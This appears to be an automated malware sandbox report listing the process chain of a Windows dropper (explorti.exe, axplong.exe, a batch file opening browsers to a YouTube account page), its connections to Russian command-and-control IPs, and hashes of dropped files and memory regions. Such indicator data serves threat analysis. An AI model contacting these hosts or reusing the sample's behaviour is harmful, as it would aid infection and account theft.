C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe

"C:\Users\Admin\AppData\Local\Temp\f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce.exe"

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe

"C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\CEA5.tmp\CEA6.tmp\CEA7.bat C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.youtube.com/account"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef71e9758,0x7fef71e9768,0x7fef71e9778

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.0.1973984473\1342185228" -parentBuildID 20221007134813 -prefsHandle 1260 -prefMapHandle 1252 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dc99275-6378-401c-aee2-3e916a331c64} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 1324 10ad8058 gpu

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1108 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1380 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1440 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=1892 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1904 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.1.38466447\1580264963" -parentBuildID 20221007134813 -prefsHandle 1508 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4f23d13a-66c8-4592-a7b8-08208f55bf3e} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 1536 f8ed258 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.2.2061216034\733566373" -childID 1 -isForBrowser -prefsHandle 2200 -prefMapHandle 2196 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e11bda11-c4ee-4788-974e-4af15dbc0166} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 2260 199e5358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.3.143158820\952057950" -childID 2 -isForBrowser -prefsHandle 2976 -prefMapHandle 2972 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {dbed8261-4483-4324-931d-75b8ed9dff5f} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 2988 1dad4a58 tab

C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

"C:\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=2148 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=1316 --field-trial-handle=2032,i,750145467879224055,14573684811165027524,131072 /prefetch:1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.4.43057313\1610499545" -childID 3 -isForBrowser -prefsHandle 3720 -prefMapHandle 3524 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f814a806-58cb-42b1-ae88-acb02d851694} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 3616 1bd9c458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.5.833534531\1612614412" -childID 4 -isForBrowser -prefsHandle 3796 -prefMapHandle 3812 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {88342b5a-b7e4-4089-80d2-fdd0217901b2} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 3828 1f5fcc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1128.6.174624359\681696808" -childID 5 -isForBrowser -prefsHandle 4012 -prefMapHandle 4016 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 760 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ecd91e93-ecbc-414c-8ac5-e92320231121} 1128 "\\.\pipe\gecko-crash-server-pipe.1128" 4000 206b1858 tab

C:\Users\Admin\1000029002\d42f45addf.exe

"C:\Users\Admin\1000029002\d42f45addf.exe"

C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe

"C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe"

C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe

"C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"

Network

Country Destination Domain Proto
RU 185.215.113.19:80 185.215.113.19 tcp
RU 185.215.113.16:80 185.215.113.16 tcp
N/A 127.0.0.1:49243 tcp
US 8.8.8.8:53 www.youtube.com udp
FR 142.250.74.238:443 www.youtube.com tcp
FR 142.250.74.238:443 www.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
FR 142.250.74.238:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 34.120.5.221:443 prod.pocket.prod.cloudops.mozgcp.net tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 autopush.prod.mozaws.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
FR 142.250.74.238:443 youtube-ui.l.google.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
FR 172.217.20.196:443 www.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 consent.youtube.com udp
RU 85.28.47.31:80 85.28.47.31 tcp
FR 172.217.20.196:443 www.google.com udp
FR 172.217.20.196:443 www.google.com tcp
N/A 127.0.0.1:49288 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 172.217.20.174:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
FR 172.217.20.174:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigzrnse.gvt1.com udp
GB 74.125.168.199:443 r2---sn-aigzrnse.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigzrnse.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigzrnse.gvt1.com udp
GB 74.125.168.199:443 r2.sn-aigzrnse.gvt1.com udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
FR 142.250.201.174:443 play.google.com udp
FR 142.250.201.174:443 play.google.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 clients2.google.com udp
FR 142.250.178.142:443 clients2.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
FR 172.217.18.206:443 consent.youtube.com tcp
FR 142.250.178.142:443 clients2.google.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 172.217.18.206:443 consent.youtube.com udp

Files

memory/2296-0-0x0000000000CB0000-0x000000000115A000-memory.dmp

memory/2296-1-0x00000000773B0000-0x00000000773B2000-memory.dmp

memory/2296-2-0x0000000000CB1000-0x0000000000CDF000-memory.dmp

memory/2296-3-0x0000000000CB0000-0x000000000115A000-memory.dmp

memory/2296-4-0x0000000000CB0000-0x000000000115A000-memory.dmp

\Users\Admin\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

MD5 5513ba120b37a0384b2beaac145cea34
SHA1 265914c39c9709afe425f1b95bc7059b43cd1578
SHA256 f4b82a4025f3b706df554e85b50a6e6be1175fb224e11475c9e7c5c0522031ce
SHA512 7ec94f417aa2cfbe2cf96e4b617e4f9052b555ea19fc9d0ca74340ce243101acfcb6c225e02e8341f1165d94e4cee97862c50985c433340f34356c989fcbd484

memory/2064-17-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2296-16-0x00000000071A0000-0x000000000764A000-memory.dmp

memory/2296-15-0x0000000000CB0000-0x000000000115A000-memory.dmp

memory/2064-18-0x0000000000E91000-0x0000000000EBF000-memory.dmp

memory/2064-19-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-21-0x0000000000E90000-0x000000000133A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000020001\c81c483364.exe

MD5 f19f62959c79af73e6353063cfab9482
SHA1 8f62871b4c9a2ab35033561e4dc0d478e629391a
SHA256 bafb29d6c0e54ea3dc758787b59dd494d24bc0d96806c8569fb2d026e2c50c65
SHA512 46cb00fbf95292c7ed2c3603a9be660b1fb35de1f6f8bf34b6e2131ec8c140e6b5df5e22a582a35e7cbe71c0aedaa1b3d7e532d3bf82f7148e25a8f8d22a28ed

C:\Users\Admin\AppData\Local\Temp\CEA5.tmp\CEA6.tmp\CEA7.bat

MD5 de9423d9c334ba3dba7dc874aa7dbc28
SHA1 bf38b137b8d780b3d6d62aee03c9d3f73770d638
SHA256 a1e1b422c40fb611a50d3f8bf34f9819f76ddb304aa2d105fb49f41f57752698
SHA512 63f13acd904378ad7de22053e1087d61a70341f1891ada3b671223fec8f841b42b6f1060a4b18c8bb865ee4cd071cadc7ff6bd6d549760945bf1645a1086f401

\??\pipe\crashpad_1856_ACOSULWVUVBXHGSN

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\datareporting\glean\db\data.safe.bin

MD5 6e85ad44a4eb57e461e0ed2afe76e816
SHA1 8e47caf5f20422a7c1e864f0cd237ee8aba71fc5
SHA256 95e57d06ddeee72dcdfd3a2e99c0e09f391a083b38c2ebad4dda1df7f78f989e
SHA512 3ae1774100b48a908ed6bfe8b8771642d72a4bfb9d2dd8d545592a199608b322df924762f7234d32a705ce0695e15ef671cef565f96955427d2aeb13db6e381c

memory/2064-101-0x0000000006020000-0x00000000064CA000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\datareporting\glean\pending_pings\50f8dc44-9442-4b3c-9e75-bbb57fc3e2e0

MD5 9f86d31eea205037842a2de2ede16f14
SHA1 ff499a3e5ddb8951638a8071f6ce7d12c41a578d
SHA256 98c9689d184b142cdb25eac4f83c53748d0b7a793afd2176f6714dd643399cfa
SHA512 733012182f88c81f14524894be801d63249d9a4bd913cadd0463fa0f4db0a71059bd9065c60980a1d85e1ea4072f046c5eff307d835af673408fd7590d6012ee

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\ShaderCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\activity-stream.discovery_stream.json.tmp

MD5 4fa148cb6fee80f059eff5a08c913cc5
SHA1 975fae2afb4a7dc3278bbd7886f0c739ead0e2a5
SHA256 5a78a19af6a3d2d4983c18c638d078bb2dbaf4a813df4624300c9be36865b542
SHA512 6a1e137eb8de57b7cc1686d8b1b83c9c68989052ceef3885aa81e1c2a10fe9d401c8f75f84e0979549bcfb151c2e03cbf9259db83f1bc220e4ec09c36adff893

C:\Users\Admin\1000029002\d42f45addf.exe

MD5 e70b307e33e856cc9cb70a59a32102da
SHA1 24b6d3e99b0e5ee94b7b591c40f7ac2b0ba6f555
SHA256 8d7e591c16734d05b2b7d4b074a16ce05dc89d904d63e6de9add91aaeef4cccd
SHA512 0c59c31f54214c1875a9314f689346c4755371bfbbfd245f3c90a00cd32b3ff8a378fdcd1b4fd597a956b39d310e3b31993103990166013ff5c61c15e63aa50b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs.js

MD5 4bfc440c9844ef6450c9959948352816
SHA1 5fd1756501797187c9d116dfcf43ea7dae93088c
SHA256 3d3b8303df2bb07f959e32cb5509fc9f402667dcda721a450d913337be10888f
SHA512 eb58937cb55c7b706f112bb102c81338b2a490011c43cde7791787c9cdf029e2ca889c5ee8387d61ef660510fe17a801f4190a03e9d2403ab3ffb5e36491f070

memory/2064-234-0x00000000068D0000-0x00000000096B0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs-1.js

MD5 d7db84fd8f9d1f12fbc55e04d7752aeb
SHA1 a4e8339f2f68f3541b9053addb92f9a3b92b9eb5
SHA256 af74e1998801ec2018d949120be6b3cdffbcb8383b608766b3f24baebf3be969
SHA512 286c4f65e22d409afa94a0cbb6211f037cccc9690bd9217d564f89c2e0f1e5dd67ff89deb8e5153e51dcc015678d910a71501b0c94b1586c0a8bf70e9d44a59e

C:\Users\Admin\AppData\Local\Temp\1000030001\77d7353e97.exe

MD5 84eccb1551a0f935ffb90b1ba34f252c
SHA1 f61b51e32e704d120f5ce4cfa396056f11df7cf5
SHA256 bed9c9b34238e724d9c237dfa440010c8743b29330ed688b5f01a0bea8d15cfd
SHA512 0cb0d40bed2927de85ec4338d2a19d2bec49487e8ada6b375a9b034e168324a1a85f9c0937560e9d2628487b7302ca6a84e50fd3b717df20fb0c08e07c5aade7

memory/1496-281-0x0000000000C20000-0x00000000010E2000-memory.dmp

memory/2064-283-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3304-297-0x0000000000400000-0x00000000031E0000-memory.dmp

memory/2064-298-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-307-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-320-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-321-0x0000000006020000-0x00000000064CA000-memory.dmp

memory/2064-325-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-326-0x00000000068D0000-0x00000000096B0000-memory.dmp

memory/3960-327-0x0000000001360000-0x0000000001822000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\sessionstore-backups\recovery.jsonlz4

MD5 19092fe999575aa0925d7909f86ef2e4
SHA1 bb200306e34da2f8541cb3958a3d70db27550b12
SHA256 c9b44c4068a3c256395ebd21798ac37edc8ff92cfec830b3f509e3b5b33305e7
SHA512 b54e7fee78d9d8c7115f81eb383d6f7a050cecaed406119160eb78de05c5e6da678bd838f3edf95cfe57d0819eceeea9f710bbf829f6d805ad74fe685387f860

memory/2064-333-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-335-0x0000000001360000-0x0000000001822000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 85430baed3398695717b0263807cf97c
SHA1 fffbee923cea216f50fce5d54219a188a5100f41
SHA256 a9f4281f82b3579581c389e8583dc9f477c7fd0e20c9dfc91a2e611e21e3407e
SHA512 06511f1f6c6d44d076b3c593528c26a602348d9c41689dbf5ff716b671c3ca5756b12cb2e5869f836dedce27b1a5cfe79b93c707fd01f8e84b620923bb61b5f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.dll

MD5 fe3355639648c417e8307c6d051e3e37
SHA1 f54602d4b4778da21bc97c7238fc66aa68c8ee34
SHA256 1ed7877024be63a049da98733fd282c16bd620530a4fb580dacec3a78ace914e
SHA512 8f4030bb2464b98eccbea6f06eb186d7216932702d94f6b84c56419e9cf65a18309711ab342d1513bf85aed402bc3535a70db4395874828f0d35c278dd2eac9c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-gmpopenh264\1.8.1.2\gmpopenh264.info

MD5 3d33cdc0b3d281e67dd52e14435dd04f
SHA1 4db88689282fd4f9e9e6ab95fcbb23df6e6485db
SHA256 f526e9f98841d987606efeaff7f3e017ba9fd516c4be83890c7f9a093ea4c47b
SHA512 a4a96743332cc8ef0f86bc2e6122618bfc75ed46781dadbac9e580cd73df89e74738638a2cccb4caa4cbbf393d771d7f2c73f825737cdb247362450a0d4a4bc1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs-1.js

MD5 73d5dac23cd74f0ccf1b4a84e471a11f
SHA1 c5a51474c5831b81c5d03733767ef2b8ee39adc5
SHA256 3a83a040f15ad17f3e25694142a2f6e971e075a1e9bd9f048104906d40bc5317
SHA512 e7cbb47f3862df2537151cf7b07d9738740cb328d074bbe17e5ce9929d8c2af8b40205b2888fb0496a3bcebbb9d7cab4e9fe217c29194e9f6b41ffd212846753

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 a01c5ecd6108350ae23d2cddf0e77c17
SHA1 c6ac28a2cd979f1f9a75d56271821d5ff665e2b6
SHA256 345d44e3aa3e1967d186a43d732c8051235c43458169a5d7d371780a6475ee42
SHA512 b046dd1b26ec0b810ee441b7ad4dc135e3f1521a817b9f3db60a32976352e8f7e53920e1a77fc5b4130aac260d79deef7e823267b4414e9cc774d8bffca56a72

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-widevinecdm\4.10.2557.0\LICENSE.txt

MD5 49ddb419d96dceb9069018535fb2e2fc
SHA1 62aa6fea895a8b68d468a015f6e6ab400d7a7ca6
SHA256 2af127b4e00f7303de8271996c0c681063e4dc7abdc7b2a8c3fe5932b9352539
SHA512 48386217dabf7556e381ab3f5924b123a0a525969ff98f91efb03b65477c94e48a15d9abcec116b54616d36ad52b6f1d7b8b84c49c204e1b9b43f26f2af92da2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-widevinecdm\4.10.2557.0\manifest.json

MD5 8be33af717bb1b67fbd61c3f4b807e9e
SHA1 7cf17656d174d951957ff36810e874a134dd49e0
SHA256 e92d3394635edfb987a7528e0ccd24360e07a299078df2a6967ca3aae22fa2dd
SHA512 6125f60418e25fee896bf59f5672945cd8f36f03665c721837bb50adf5b4dfef2dddbfcfc817555027dcfa90e1ef2a1e80af1219e8063629ea70263d2fc936a7

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll

MD5 33bf7b0439480effb9fb212efce87b13
SHA1 cee50f2745edc6dc291887b6075ca64d716f495a
SHA256 8ee42d9258e20bbc5bfdfae61605429beb5421ffeaaa0d02b86d4978f4b4ac4e
SHA512 d329a1a1d98e302142f2776de8cc2cd45a465d77cb21c461bdf5ee58c68073a715519f449cb673977288fe18401a0abcce636c85abaec61a4a7a08a16c924275

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.lib

MD5 688bed3676d2104e7f17ae1cd2c59404
SHA1 952b2cdf783ac72fcb98338723e9afd38d47ad8e
SHA256 33899a3ebc22cb8ed8de7bd48c1c29486c0279b06d7ef98241c92aef4e3b9237
SHA512 7a0e3791f75c229af79dd302f7d0594279f664886fea228cfe78e24ef185ae63aba809aa1036feb3130066deadc8e78909c277f0a7ed1e3485df3cf2cd329776

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\gmp-widevinecdm\4.10.2557.0\widevinecdm.dll.sig

MD5 937326fead5fd401f6cca9118bd9ade9
SHA1 4526a57d4ae14ed29b37632c72aef3c408189d91
SHA256 68a03f075db104f84afdd8fca45a7e4bff7b55dc1a2a24272b3abe16d8759c81
SHA512 b232f6cf3f88adb346281167ac714c4c4c7aac15175087c336911946d12d63d3a3a458e06b298b41a7ec582ef09fe238da3a3166ff89c450117228f7485c22d2

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9tg2k5l8.default-release\prefs-1.js

MD5 0992874738f1bc1d3a1d96ab6e6d7ad2
SHA1 7b007fa124a724cd46b3cfba01f8bca049289a44
SHA256 68bc324c508ee15aabde79735fc4e8705c78ea7e0c310864213eeab4a124f766
SHA512 6af6b4b18bcc2e2e301bf5ea8af381262c71036a58962e4e9a4fed1c860869f4418265872ff96de95e4bc0322bf1b766aab6654271c9d451690fd9beb8207c6e

memory/2064-421-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-422-0x0000000001360000-0x0000000001822000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 96fba9e8594731fac5416a649f1a0f9e
SHA1 2e6ccdee3c1ce66a44c1e45e475ccdfabde3bd8a
SHA256 7f13fef3ac7cc801c98135efbdefe2e5b1bb950cb3d3a3e9df45fda7e8441f0d
SHA512 b6c278b3b7650ec28a4336db7169f5fee4160e4b28dacd2d92dbc2dca96a02a7e0655fb0dd6c25d17af9d2876fc280b88a7cc141c54caaab8296dd2b257712c1

memory/2064-430-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-431-0x0000000001360000-0x0000000001822000-memory.dmp

memory/3960-433-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-432-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/2064-446-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-447-0x0000000001360000-0x0000000001822000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d0863918fb413bc7aceee3cd94003d43
SHA1 725b270bd6da9f48894aaaf6d19dbf2f349b7ea1
SHA256 914d6b5aa4e0172d3736acc544eb05b8d411b09dc6bdfaa34616291795a709c0
SHA512 25576a9d96391784ac576d002fea6af5aed376a16cf2b4f0dc3770c8612b3ce8e67d20a17ad7159bf5fbde24cc79e20fa994fb11fe6e2f821dfcaca79d9ba1bf

memory/2064-459-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-460-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-461-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-462-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-463-0x0000000000E90000-0x000000000133A000-memory.dmp

memory/3960-464-0x0000000001360000-0x0000000001822000-memory.dmp

memory/2064-465-0x0000000000E90000-0x000000000133A000-memory.dmp

